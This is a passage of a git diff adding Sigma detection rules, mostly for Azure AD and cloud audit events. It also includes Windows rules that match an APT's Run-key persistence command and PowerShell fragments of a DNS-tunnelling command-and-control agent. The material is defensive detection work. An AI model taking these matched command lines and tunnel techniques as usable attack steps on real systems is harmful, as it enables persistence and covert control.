'\hostname.exe' + CommandLine|contains: '>>' + CommandLine|endswith: 'temps.dat' + selection_persistence: + CommandLine|contains: '/C REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WinNetworkSecurity" /t REG_SZ /d' + condition: selection_recon or selection_persistence # requires both +fields: + - ComputerName + - User + - Image + - CommandLine +falsepositives: + - Unknown +level: high +tags: + - attack.persistence + - attack.t1547.001 + - attack.discovery + - attack.t1057 + - attack.t1082 + - attack.t1016 + - attack.t1033 + - attack.g0091 diff --git a/bin/main/rules/others_apt/apt_silence_eda.yml b/bin/main/rules/others_apt/apt_silence_eda.yml new file mode 100644 index 000000000..8f4d5ef82 --- /dev/null +++ b/bin/main/rules/others_apt/apt_silence_eda.yml @@ -0,0 +1,41 @@ +title: Silence.EDA Detection +id: 3ceb2083-a27f-449a-be33-14ec1b7cc973 +status: test +description: Detects Silence empireDNSagent +author: Alina Stepchenkova, Group-IB, oscd.community +date: 2019/11/01 +modified: 2021/11/27 +logsource: + product: windows + service: powershell +detection: + empire: + ScriptBlockText|contains|all: # better to randomise the order + - 'System.Diagnostics.Process' + - 'Stop-Computer' + - 'Restart-Computer' + - 'Exception in execution' + - '$cmdargs' + - 'Close-Dnscat2Tunnel' + dnscat: + ScriptBlockText|contains|all: # better to randomise the order + - 'set type=$LookupType`nserver' + - '$Command | nslookup 2>&1 | Out-String' + - 'New-RandomDNSField' + - '[Convert]::ToString($SYNOptions, 16)' + - '$Session.Dead = $True' + - '$Session["Driver"] -eq' + condition: empire and dnscat +falsepositives: + - Unknown +level: critical +tags: + - attack.execution + - attack.t1059.001 + - attack.command_and_control + - attack.t1071.004 + - attack.t1572 + - attack.impact + - attack.t1529 + - attack.g0091 + - attack.s0363 diff --git a/bin/main/rules/others_cloud/azure/azure_aad_secops_signin_failure_bad_password_threshold.yml b/bin/main/rules/others_cloud/azure/azure_aad_secops_signin_failure_bad_password_threshold.yml new file mode 100644 index 000000000..a914ca337 --- /dev/null +++ b/bin/main/rules/others_cloud/azure/azure_aad_secops_signin_failure_bad_password_threshold.yml @@ -0,0 +1,27 @@ +title: Sign-in Failure Bad Password Threshold +id: dff74231-dbed-42ab-ba49-83289be2ac3a +description: Define a baseline threshold and then monitor and adjust to suit your organizational behaviors and limit false alerts from being generated. +author: Corissa Koopmans, '@corissalea' +date: 2022/04/21 +references: + - https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-privileged-accounts#things-to-monitor +logsource: + product: azure + service: signinlogs +detection: + selection: + ResultType: 50126 + ResultDescription: Invalid username or password or Invalid on-premises username or password. + filter_computer: + TargetUserName|endswith: '$' + condition: selection and not filter_computer +falsepositives: + - Failed Azure AD Connect Synchronization + - Service account use with an incorrect password specified + - Misconfigured systems + - Vulnerability scanners +level: high +status: experimental +tags: + - attack.credential_access + - attack.t1110 diff --git a/bin/main/rules/others_cloud/azure/azure_aadhybridhealth_adfs_new_server.yml b/bin/main/rules/others_cloud/azure/azure_aadhybridhealth_adfs_new_server.yml new file mode 100644 index 000000000..7ea030282 --- /dev/null +++ b/bin/main/rules/others_cloud/azure/azure_aadhybridhealth_adfs_new_server.yml @@ -0,0 +1,27 @@ +title: Azure Active Directory Hybrid Health AD FS New Server +id: 288a39fc-4914-4831-9ada-270e9dc12cb4 +description: | + This detection uses azureactivity logs (Administrative category) to identify the creation or update of a server instance in an Azure AD Hybrid health AD FS service. + A threat actor can create a new AD Health ADFS service and create a fake server instance to spoof AD FS signing logs. There is no need to compromise an on-prem AD FS server. + This can be done programmatically via HTTP requests to Azure. +status: experimental +date: 2021/08/26 +author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC +tags: + - attack.defense_evasion + - attack.t1578 +references: + - https://o365blog.com/post/hybridhealthagent/ +logsource: + product: azure + service: azureactivity +detection: + selection: + CategoryValue: 'Administrative' + ResourceProviderValue: 'Microsoft.ADHybridHealthService' + ResourceId|contains: 'AdFederationService' + OperationNameValue: 'Microsoft.ADHybridHealthService/services/servicemembers/action' + condition: selection +falsepositives: + - Legitimate AD FS servers added to an AAD Health AD FS service instance +level: medium diff --git a/bin/main/rules/others_cloud/azure/azure_aadhybridhealth_adfs_service_delete.yml b/bin/main/rules/others_cloud/azure/azure_aadhybridhealth_adfs_service_delete.yml new file mode 100644 index 000000000..9d1966ce1 --- /dev/null +++ b/bin/main/rules/others_cloud/azure/azure_aadhybridhealth_adfs_service_delete.yml @@ -0,0 +1,27 @@ +title: Azure Active Directory Hybrid Health AD FS Service Delete +id: 48739819-8230-4ee3-a8ea-e0289d1fb0ff +description: | + This detection uses azureactivity logs (Administrative category) to identify the deletion of an Azure AD Hybrid health AD FS service instance in a tenant. + A threat actor can create a new AD Health ADFS service and create a fake server to spoof AD FS signing logs. + The health AD FS service can then be deleted after it is not longer needed via HTTP requests to Azure. +status: experimental +date: 2021/08/26 +author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC +tags: + - attack.defense_evasion + - attack.t1578.003 +references: + - https://o365blog.com/post/hybridhealthagent/ +logsource: + product: azure + service: azureactivity +detection: + selection: + CategoryValue: 'Administrative' + ResourceProviderValue: 'Microsoft.ADHybridHealthService' + ResourceId|contains: 'AdFederationService' + OperationNameValue: 'Microsoft.ADHybridHealthService/services/delete' + condition: selection +falsepositives: + - Legitimate AAD Health AD FS service instances being deleted in a tenant +level: medium diff --git a/bin/main/rules/others_cloud/azure/azure_account_lockout.yml b/bin/main/rules/others_cloud/azure/azure_account_lockout.yml new file mode 100644 index 000000000..102f1de5c --- /dev/null +++ b/bin/main/rules/others_cloud/azure/azure_account_lockout.yml @@ -0,0 +1,21 @@ +title: Account Lockout +id: 2b7d6fc0-71ac-4cf7-8ed1-b5788ee5257a +status: experimental +author: AlertIQ +date: 2021/10/10 +description: Identifies user account which has been locked because the user tried to sign in too many times with an incorrect user ID or password. +references: + - https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-privileged-accounts +logsource: + product: azure + service: signinlogs +detection: + selection: + ResultType: 50053 + condition: selection +level: medium +falsepositives: + - Unknown +tags: + - attack.credential_access + - attack.t1110 diff --git a/bin/main/rules/others_cloud/azure/azure_ad_bitlocker_key_retrieval.yml b/bin/main/rules/others_cloud/azure/azure_ad_bitlocker_key_retrieval.yml new file mode 100644 index 000000000..e203e67b7 --- /dev/null +++ b/bin/main/rules/others_cloud/azure/azure_ad_bitlocker_key_retrieval.yml @@ -0,0 +1,22 @@ +title: Bitlocker Key Retrieval +id: a0413867-daf3-43dd-9245-734b3a787942 +description: Monitor and alert for Bitlocker key retrieval. +author: Michael Epping, '@mepples21' +date: 2022/06/28 +references: + - https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-devices#bitlocker-key-retrieval +logsource: + product: azure + service: auditlogs +detection: + selection: + Category: KeyManagement + OperationName: Read BitLocker key + condition: selection +falsepositives: + - Unknown +level: medium +status: experimental +tags: + - attack.valid_accounts + - attack.t1078 diff --git a/bin/main/rules/others_cloud/azure/azure_ad_device_registration_or_join_without_mfa.yml b/bin/main/rules/others_cloud/azure/azure_ad_device_registration_or_join_without_mfa.yml new file mode 100644 index 000000000..23c3582cb --- /dev/null +++ b/bin/main/rules/others_cloud/azure/azure_ad_device_registration_or_join_without_mfa.yml @@ -0,0 +1,24 @@ +title: Device Registration or Join Without MFA +id: 5afa454e-030c-4ab4-9253-a90aa7fcc581 +description: Monitor and alert for device registration or join events where MFA was not performed. +author: Michael Epping, '@mepples21' +date: 2022/06/28 +references: + - https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-devices#device-registrations-and-joins-outside-policy +logsource: + product: azure + service: signinlogs +detection: + selection: + ResourceDisplayName: 'Device Registration Service' + conditionalAccessStatus: 'success' + filter_mfa: + AuthenticationRequirement: 'multiFactorAuthentication' + condition: selection and not filter_mfa +falsepositives: + - Unknown +level: medium +status: experimental +tags: + - attack.valid_accounts + - attack.t1078 diff --git a/bin/main/rules/others_cloud/azure/azure_ad_device_registration_policy_changes.yml b/bin/main/rules/others_cloud/azure/azure_ad_device_registration_policy_changes.yml new file mode 100644 index 000000000..e4c8d8555 --- /dev/null +++ b/bin/main/rules/others_cloud/azure/azure_ad_device_registration_policy_changes.yml @@ -0,0 +1,22 @@ +title: Changes to Device Registration Policy +id: 9494bff8-959f-4440-bbce-fb87a208d517 +description: Monitor and alert for changes to the device registration policy. +author: Michael Epping, '@mepples21' +date: 2022/06/28 +references: + - https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-devices#device-registrations-and-joins-outside-policy +logsource: + product: azure + service: auditlogs +detection: + selection: + Category: 'Policy' + ActivityDisplayName: 'Set device registration policies' + condition: selection +falsepositives: + - Unknown +level: high +status: experimental +tags: + - attack.domain_policy_modification + - attack.t1484 diff --git a/bin/main/rules/others_cloud/azure/azure_ad_sign_ins_from_noncompliant_devices.yml b/bin/main/rules/others_cloud/azure/azure_ad_sign_ins_from_noncompliant_devices.yml new file mode 100644 index 000000000..45003d427 --- /dev/null +++ b/bin/main/rules/others_cloud/azure/azure_ad_sign_ins_from_noncompliant_devices.yml @@ -0,0 +1,21 @@ +title: Sign-ins from Non-Compliant Devices +id: 4f77e1d7-3982-4ee0-8489-abf2d6b75284 +description: Monitor and alert for sign-ins where the device was non-compliant. +author: Michael Epping, '@mepples21' +date: 2022/06/28 +references: + - https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-devices#non-compliant-device-sign-in +logsource: + product: azure + service: signinlogs +detection: + selection: + DeviceDetail.isCompliant: 'false' + condition: selection +falsepositives: + - Unknown +level: high +status: experimental +tags: + - attack.valid_accounts + - attack.t1078 diff --git a/bin/main/rules/others_cloud/azure/azure_ad_sign_ins_from_unknown_devices.yml b/bin/main/rules/others_cloud/azure/azure_ad_sign_ins_from_unknown_devices.yml new file mode 100644 index 000000000..59e6ad2f1 --- /dev/null +++ b/bin/main/rules/others_cloud/azure/azure_ad_sign_ins_from_unknown_devices.yml @@ -0,0 +1,24 @@ +title: Sign-ins by Unknown Devices +id: 4d136857-6a1a-432a-82fc-5dd497ee5e7c +description: Monitor and alert for Sign-ins by unknown devices from non-Trusted locations. +author: Michael Epping, '@mepples21' +date: 2022/06/28 +references: + - https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-devices#non-compliant-device-sign-in +logsource: + product: azure + service: signinlogs +detection: + selection: + AuthenticationRequirement: singleFactorAuthentication + ResultType: '0' + NetworkLocationDetails: '[]' + DeviceDetail.deviceId: '' + condition: selection +falsepositives: + - Unknown +level: low +status: experimental +tags: + - attack.valid_accounts + - attack.t1078 diff --git a/bin/main/rules/others_cloud/azure/azure_ad_user_added_to_admin_role.yml b/bin/main/rules/others_cloud/azure/azure_ad_user_added_to_admin_role.yml new file mode 100644 index 000000000..a6019c0af --- /dev/null +++ b/bin/main/rules/others_cloud/azure/azure_ad_user_added_to_admin_role.yml @@ -0,0 +1,26 @@ +title: User Added to an Administrator's Azure AD Role +id: ebbeb024-5b1d-4e16-9c0c-917f86c708a7 +description: User Added to an Administrator's Azure AD Role +author: Raphaël CALVET, @MetallicHack +date: 2021/10/04 +references: + - https://attack.mitre.org/techniques/T1098/003/ + - https://m365internals.com/2021/07/13/what-ive-learned-from-doing-a-year-of-cloud-forensics-in-azure-ad/ +logsource: + product: azure + service: activitylogs +detection: + selection: + Operation: 'Add member to role.' + Workload: 'AzureActiveDirectory' + ModifiedProperties.NewValue|endswith: + - 'Admins' + - 'Administrator' + condition: selection +falsepositives: + - PIM (Privileged Identity Management) generates this event each time 'eligible role' is enabled. +level: medium +status: experimental +tags: + - attack.persistence + - attack.t1098.003 diff --git a/bin/main/rules/others_cloud/azure/azure_ad_users_added_to_device_admin_roles.yml b/bin/main/rules/others_cloud/azure/azure_ad_users_added_to_device_admin_roles.yml new file mode 100644 index 000000000..0c3140549 --- /dev/null +++ b/bin/main/rules/others_cloud/azure/azure_ad_users_added_to_device_admin_roles.yml @@ -0,0 +1,27 @@ +title: Users Added to Global or Device Admin Roles +id: 11c767ae-500b-423b-bae3-b234450736ed +description: Monitor and alert for users added to device admin roles. +author: Michael Epping, '@mepples21' +date: 2022/06/28 +references: + - https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-devices#device-administrator-roles +logsource: + product: azure + service: auditlogs +detection: + selection: + Category: RoleManagement + OperationName|contains|all: + - 'Add' + - 'member to role' + TargetResources|contains: + - '7698a772-787b-4ac8-901f-60d6b08affd2' + - '62e90394-69f5-4237-9190-012177145e10' + condition: selection +falsepositives: + - Unknown +level: high +status: experimental +tags: + - attack.valid_accounts + - attack.t1078 diff --git a/bin/main/rules/others_cloud/azure/azure_app_appid_uri_changes.yml b/bin/main/rules/others_cloud/azure/azure_app_appid_uri_changes.yml new file mode 100644 index 000000000..3b4020f58 --- /dev/null +++ b/bin/main/rules/others_cloud/azure/azure_app_appid_uri_changes.yml @@ -0,0 +1,24 @@ +title: Application AppID Uri Configuration Changes +id: 1b45b0d1-773f-4f23-aedc-814b759563b1 +description: Detects when a configuration change is made to an applications AppID URI. +author: Mark Morowczynski '@markmorow', Bailey Bercik '@baileybercik' +date: 2022/06/02 +references: + - https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-applications#appid-uri-added-modified-or-removed +logsource: + product: azure + service: auditlogs +detection: + selection: + properties.message: + - Update Application + - Update Service principal + condition: selection +falsepositives: + - When and administrator is making legitmate AppID URI configuration changes to an application. This should be a planned event. +level: high +status: experimental +tags: + - attack.t1528 + - attack.persistence + - attack.credential_access diff --git a/bin/main/rules/others_cloud/azure/azure_app_credential_added.yml b/bin/main/rules/others_cloud/azure/azure_app_credential_added.yml new file mode 100644 index 000000000..21f08f9e1 --- /dev/null +++ b/bin/main/rules/others_cloud/azure/azure_app_credential_added.yml @@ -0,0 +1,23 @@ +title: Added Credentials to Existing Application +id: cbb67ecc-fb70-4467-9350-c910bdf7c628 +description: Detects when a new credential is added to an existing applcation. Any additional credentials added outside of expected processes could be a malicious actor using those credentials. +author: Mark Morowczynski '@markmorow', Bailey Bercik '@baileybercik' +date: 2022/05/26 +references: + - https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-applications#application-credentials +logsource: + product: azure + service: auditlogs +detection: + selection: + properties.message: + - Update Application-Certificates and secrets management + - Update Service principal/Update Application + condition: selection +falsepositives: + - When credentials are added/removed as part of the normal working hours/workflows +level: high +status: experimental +tags: + - attack.t1098 + - attack.persistence diff --git a/bin/main/rules/others_cloud/azure/azure_app_credential_modification.yml b/bin/main/rules/others_cloud/azure/azure_app_credential_modification.yml new file mode 100644 index 000000000..5f226d2fc --- /dev/null +++ b/bin/main/rules/others_cloud/azure/azure_app_credential_modification.yml @@ -0,0 +1,22 @@ +title: Azure Application Credential Modified +id: cdeef967-f9a1-4375-90ee-6978c5f23974 +description: Identifies when a application credential is modified. +author: Austin Songer @austinsonger +status: experimental +date: 2021/09/02 +references: + - https://www.cloud-architekt.net/auditing-of-msi-and-service-principals/ +logsource: + product: azure + service: activitylogs +detection: + selection: + properties.message: 'Update application - Certificates and secrets management' + condition: selection +level: medium +tags: + - attack.impact +falsepositives: + - Application credential added may be performed by a system administrator. + - Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. + - Application credential added from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. diff --git a/bin/main/rules/others_cloud/azure/azure_app_device_code_authentication.yml b/bin/main/rules/others_cloud/azure/azure_app_device_code_authentication.yml new file mode 100644 index 000000000..5301f8db6 --- /dev/null +++ b/bin/main/rules/others_cloud/azure/azure_app_device_code_authentication.yml @@ -0,0 +1,27 @@ +title: Application Using Device Code Authentication Flow +id: 248649b7-d64f-46f0-9fb2-a52774166fb5 +status: experimental +description: | + Device code flow is an OAuth 2.0 protocol flow specifically for input constrained devices and is not used in all environments. + If this type of flow is seen in the environment and not being used in an input constrained device scenario, further investigation is warranted. + This can be a misconfigured application or potentially something malicious. +author: Mark Morowczynski '@markmorow', Bailey Bercik '@baileybercik' +date: 2022/06/01 +references: + - https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-applications#application-authentication-flows +logsource: + product: azure + service: signinlogs +detection: + selection: + properties.message: Device Code + condition: selection +falsepositives: + - Applications that are input constrained will need to use device code flow and are valid authentications. +level: medium +tags: + - attack.t1078 + - attack.defense_evasion + - attack.persistence + - attack.privilege_escalation + - attack.initial_access diff --git a/bin/main/rules/others_cloud/azure/azure_app_owner_added.yml b/bin/main/rules/others_cloud/azure/azure_app_owner_added.yml new file mode 100644 index 000000000..54b3b92f6 --- /dev/null +++ b/bin/main/rules/others_cloud/azure/azure_app_owner_added.yml @@ -0,0 +1,23 @@ +title: Added Owner To Application +id: 74298991-9fc4-460e-a92e-511aa60baec1 +description: Detects when a new owner is added to an application. This gives that account privileges to make modifications and configuration changes to the application. +author: Mark Morowczynski '@markmorow', Bailey Bercik '@baileybercik' +date: 2022/06/02 +references: + - https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-applications#new-owner +logsource: + product: azure + service: auditlogs +detection: + selection: + properties.message: Add owner to application + condition: selection +falsepositives: + - When a new application owner is added by an administrator +level: medium +status: experimental +tags: + - attack.t1528 + - attack.persistence + - attack.credential_access + - attack.defense_evasion diff --git a/bin/main/rules/others_cloud/azure/azure_app_ropc_authentication.yml b/bin/main/rules/others_cloud/azure/azure_app_ropc_authentication.yml new file mode 100644 index 000000000..82222f0ca --- /dev/null +++ b/bin/main/rules/others_cloud/azure/azure_app_ropc_authentication.yml @@ -0,0 +1,24 @@ +title: Applications That Are Using ROPC Authentication Flow +id: 55695bc0-c8cf-461f-a379-2535f563c854 +description: Resource owner password credentials (ROPC) should be avoided if at all possible as this requires the user to expose their current password credentials to the application directly. The application then uses those credentials to authenticate the user against the identity provider. +author: Mark Morowczynski '@markmorow', Bailey Bercik '@baileybercik' +date: 2022/06/01 +references: + - https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-applications#application-authentication-flows +logsource: + product: azure + service: signinlogs +detection: + selection: + properties.message: ROPC + condition: selection +falsepositives: + - Applications that are being used as part of automated testing or a legacy application that cannot use any other modern authentication flow +level: medium +status: experimental +tags: + - attack.t1078 + - attack.defense_evasion + - attack.persistence + - attack.privilege_escalation + - attack.initial_access diff --git a/bin/main/rules/others_cloud/azure/azure_app_uri_modifications.yml b/bin/main/rules/others_cloud/azure/azure_app_uri_modifications.yml new file mode 100644 index 000000000..a2cda3522 --- /dev/null +++ b/bin/main/rules/others_cloud/azure/azure_app_uri_modifications.yml @@ -0,0 +1,24 @@ +title: Application URI Configuration Changes +id: 0055ad1f-be85-4798-83cf-a6da17c993b3 +description: Detects when a configuration change is made to an applications URI. + URIs for domain names that no longer exist (dangling URIs), not using HTTPS, wildcards at the end of the domain, URIs that are no unique to that app, + or URIs that point to domains you do not control should be investigated. +author: Mark Morowczynski '@markmorow', Bailey Bercik '@baileybercik' +date: 2022/06/02 +references: + - https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-applications#application-configuration-changes +logsource: + product: azure + service: auditlogs +detection: + selection: + properties.message: Update Application Sucess- Property Name AppAddress + condition: selection +falsepositives: + - When and administrator is making legitmate URI configuration changes to an application. This should be a planned event. +level: high +status: experimental +tags: + - attack.t1528 + - attack.persistence + - attack.credential_access diff --git a/bin/main/rules/others_cloud/azure/azure_application_deleted.yml b/bin/main/rules/others_cloud/azure/azure_application_deleted.yml new file mode 100644 index 000000000..a2e52ca9d --- /dev/null +++ b/bin/main/rules/others_cloud/azure/azure_application_deleted.yml @@ -0,0 +1,24 @@ +title: Azure Application Deleted +id: 410d2a41-1e6d-452f-85e5-abdd8257a823 +description: Identifies when a application is deleted in Azure. +author: Austin Songer @austinsonger +status: experimental +date: 2021/09/03 +references: + - https://docs.microsoft.com/en-us/azure/active-directory/reports-monitoring/reference-audit-activities#application-proxy +logsource: + product: azure + service: activitylogs +detection: + selection: + properties.message: + - Delete application + - Hard Delete application + condition: selection +level: medium +tags: + - attack.defense_evasion +falsepositives: + - Application being deleted may be performed by a system administrator. + - Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. + - Application deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. diff --git a/bin/main/rules/others_cloud/azure/azure_application_gateway_modified_or_deleted.yml b/bin/main/rules/others_cloud/azure/azure_application_gateway_modified_or_deleted.yml new file mode 100644 index 000000000..d242e0caa --- /dev/null +++ b/bin/main/rules/others_cloud/azure/azure_application_gateway_modified_or_deleted.yml @@ -0,0 +1,24 @@ +title: Azure Application Gateway Modified or Deleted +id: ad87d14e-7599-4633-ba81-aeb60cfe8cd6 +description: Identifies when a application gateway is modified or deleted. +author: Austin Songer +status: experimental +date: 2021/08/16 +references: + - https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations +logsource: + product: azure + service: activitylogs +detection: + selection: + properties.message: + - MICROSOFT.NETWORK/APPLICATIONGATEWAYS/WRITE + - MICROSOFT.NETWORK/APPLICATIONGATEWAYS/DELETE + condition: selection +level: medium +tags: + - attack.impact +falsepositives: + - Application gateway being modified or deleted may be performed by a system administrator. + - Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. + - Application gateway modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. diff --git a/bin/main/rules/others_cloud/azure/azure_application_security_group_modified_or_deleted.yml b/bin/main/rules/others_cloud/azure/azure_application_security_group_modified_or_deleted.yml new file mode 100644 index 000000000..abd3d183e --- /dev/null +++ b/bin/main/rules/others_cloud/azure/azure_application_security_group_modified_or_deleted.yml @@ -0,0 +1,24 @@ +title: Azure Application Security Group Modified or Deleted +id: 835747f1-9329-40b5-9cc3-97d465754ce6 +description: Identifies when a application security group is modified or deleted. +author: Austin Songer +status: experimental +date: 2021/08/16 +references: + - https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations +logsource: + product: azure + service: activitylogs +detection: + selection: + properties.message: + - MICROSOFT.NETWORK/APPLICATIONSECURITYGROUPS/WRITE + - MICROSOFT.NETWORK/APPLICATIONSECURITYGROUPS/DELETE + condition: selection +level: medium +tags: + - attack.impact +falsepositives: + - Application security group being modified or deleted may be performed by a system administrator. + - Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. + - Application security group modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. diff --git a/bin/main/rules/others_cloud/azure/azure_blocked_account_attempt.yml b/bin/main/rules/others_cloud/azure/azure_blocked_account_attempt.yml new file mode 100644 index 000000000..cf0984b80 --- /dev/null +++ b/bin/main/rules/others_cloud/azure/azure_blocked_account_attempt.yml @@ -0,0 +1,23 @@ +title: Account Disabled or Blocked for Sign in Attempts +id: 4afac85c-224a-4dd7-b1af-8da40e1c60bd +description: Detects when an account is disabled or blocked for sign in but tried to log in +author: Yochana Henderson, '@Yochana-H' +date: 2022/06/17 +references: + - https://docs.microsoft.com/en-gb/azure/active-directory/fundamentals/security-operations-privileged-accounts +logsource: + product: azure + service: signinlogs +detection: + selection: + ResultType: 50057 + ResultDescription: Failure + condition: selection +level: medium +falsepositives: + - Account disabled or blocked in error + - Automation account has been blocked or disabled +status: experimental +tags: + - attack.credential_access + - attack.t1110 diff --git a/bin/main/rules/others_cloud/azure/azure_change_to_authentication_method.yml b/bin/main/rules/others_cloud/azure/azure_change_to_authentication_method.yml new file mode 100644 index 000000000..b251b5c25 --- /dev/null +++ b/bin/main/rules/others_cloud/azure/azure_change_to_authentication_method.yml @@ -0,0 +1,22 @@ +title: Change to Authentication Method +id: 4d78a000-ab52-4564-88a5-7ab5242b20c7 +status: experimental +author: AlertIQ +date: 2021/10/10 +description: Change to authentication method could be an indicated of an attacker adding an auth method to the account so they can have continued access. +references: + - https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-privileged-accounts +logsource: + product: azure + service: auditlogs +detection: + selection: + LoggedByService: 'Authentication Methods' + Category: 'UserManagement' + OperationName: 'User registered security info' + condition: selection +level: medium +falsepositives: + - Unknown +tags: + - attack.credential_access diff --git a/bin/main/rules/others_cloud/azure/azure_conditional_access_failure.yml b/bin/main/rules/others_cloud/azure/azure_conditional_access_failure.yml new file mode 100644 index 000000000..d0af28e9b --- /dev/null +++ b/bin/main/rules/others_cloud/azure/azure_conditional_access_failure.yml @@ -0,0 +1,24 @@ +title: Sign-in Failure Due to Conditional Access Requirements Not Met +id: b4a6d707-9430-4f5f-af68-0337f52d5c42 +description: Define a baseline threshold for failed sign-ins due to Conditional Access failures +author: Yochana Henderson, '@Yochana-H' +date: 2022/06/01 +references: + - https://docs.microsoft.com/en-gb/azure/active-directory/fundamentals/security-operations-privileged-accounts +logsource: + product: azure + service: signinlogs +detection: + selection: + ResultType: 53003 + Resultdescription: Blocked by Conditional Access + condition: selection +falsepositives: + - Service Account misconfigured + - Misconfigured Systems + - Vulnerability Scanners +level: high +status: experimental +tags: + - attack.credential_access + - attack.t1110 diff --git a/bin/main/rules/others_cloud/azure/azure_container_registry_created_or_deleted.yml b/bin/main/rules/others_cloud/azure/azure_container_registry_created_or_deleted.yml new file mode 100644 index 000000000..e47111824 --- /dev/null +++ b/bin/main/rules/others_cloud/azure/azure_container_registry_created_or_deleted.yml @@ -0,0 +1,27 @@ +title: Azure Container Registry Created or Deleted +id: 93e0ef48-37c8-49ed-a02c-038aab23628e +description: Detects when a Container Registry is created or deleted. +author: Austin Songer @austinsonger +status: experimental +date: 2021/08/07 +references: + - https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes + - https://www.microsoft.com/security/blog/2021/03/23/secure-containerized-environments-with-updated-threat-matrix-for-kubernetes/ + - https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/ + - https://medium.com/mitre-engenuity/att-ck-for-containers-now-available-4c2359654bf1 + - https://attack.mitre.org/matrices/enterprise/cloud/ +logsource: + product: azure + service: activitylogs +detection: + selection: + properties.message: + - MICROSOFT.CONTAINERREGISTRY/REGISTRIES/WRITE + - MICROSOFT.CONTAINERREGISTRY/REGISTRIES/DELETE + condition: selection +level: low +tags: + - attack.impact +falsepositives: + - Container Registry being created or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. + - Container Registry created or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. diff --git a/bin/main/rules/others_cloud/azure/azure_creating_number_of_resources_detection.yml b/bin/main/rules/others_cloud/azure/azure_creating_number_of_resources_detection.yml new file mode 100644 index 000000000..04c3ed96e --- /dev/null +++ b/bin/main/rules/others_cloud/azure/azure_creating_number_of_resources_detection.yml @@ -0,0 +1,22 @@ +title: Number Of Resource Creation Or Deployment Activities +id: d2d901db-7a75-45a1-bc39-0cbf00812192 +status: test +description: Number of VM creations or deployment activities occur in Azure via the azureactivity log. +author: sawwinnnaung +references: + - https://github.com/Azure/Azure-Sentinel/blob/master/Detections/azureactivity/Creating_Anomalous_Number_Of_Resources_detection.yaml +date: 2020/05/07 +modified: 2021/11/27 +logsource: + product: azure + service: azureactivity +detection: + keywords: + - Microsoft.Compute/virtualMachines/write + - Microsoft.Resources/deployments/write + condition: keywords +falsepositives: + - Valid change +level: medium +tags: + - attack.t1098 diff --git a/bin/main/rules/others_cloud/azure/azure_device_no_longer_managed_or_compliant.yml b/bin/main/rules/others_cloud/azure/azure_device_no_longer_managed_or_compliant.yml new file mode 100644 index 000000000..5fc10bc63 --- /dev/null +++ b/bin/main/rules/others_cloud/azure/azure_device_no_longer_managed_or_compliant.yml @@ -0,0 +1,22 @@ +title: Azure Device No Longer Managed or Compliant +id: 542b9912-c01f-4e3f-89a8-014c48cdca7d +description: Identifies when a device in azure is no longer managed or compliant +author: Austin Songer @austinsonger +status: experimental +date: 2021/09/03 +references: + - https://docs.microsoft.com/en-us/azure/active-directory/reports-monitoring/reference-audit-activities#core-directory +logsource: + product: azure + service: activitylogs +detection: + selection: + properties.message: + - Device no longer compliant + - Device no longer managed + condition: selection +level: medium +tags: + - attack.impact +falsepositives: + - Administrator may have forgotten to review the device. diff --git a/bin/main/rules/others_cloud/azure/azure_device_or_configuration_modified_or_deleted.yml b/bin/main/rules/others_cloud/azure/azure_device_or_configuration_modified_or_deleted.yml new file mode 100644 index 000000000..9f18c1e9f --- /dev/null +++ b/bin/main/rules/others_cloud/azure/azure_device_or_configuration_modified_or_deleted.yml @@ -0,0 +1,26 @@ +title: Azure Device or Configuration Modified or Deleted +id: 46530378-f9db-4af9-a9e5-889c177d3881 +description: Identifies when a device or device configuration in azure is modified or deleted. +author: Austin Songer @austinsonger +status: experimental +date: 2021/09/03 +references: + - https://docs.microsoft.com/en-us/azure/active-directory/reports-monitoring/reference-audit-activities#core-directory +logsource: + product: azure + service: activitylogs +detection: + selection: + properties.message: + - Delete device + - Delete device configuration + - Update device + - Update device configuration + condition: selection +level: medium +tags: + - attack.impact +falsepositives: + - Device or device configuration being modified or deleted may be performed by a system administrator. + - Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. + - Device or device configuration modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. diff --git a/bin/main/rules/others_cloud/azure/azure_dns_zone_modified_or_deleted.yml b/bin/main/rules/others_cloud/azure/azure_dns_zone_modified_or_deleted.yml new file mode 100644 index 000000000..faa86c01e --- /dev/null +++ b/bin/main/rules/others_cloud/azure/azure_dns_zone_modified_or_deleted.yml @@ -0,0 +1,24 @@ +title: Azure DNS Zone Modified or Deleted +id: af6925b0-8826-47f1-9324-337507a0babd +description: Identifies when DNS zone is modified or deleted. +author: Austin Songer @austinsonger +status: experimental 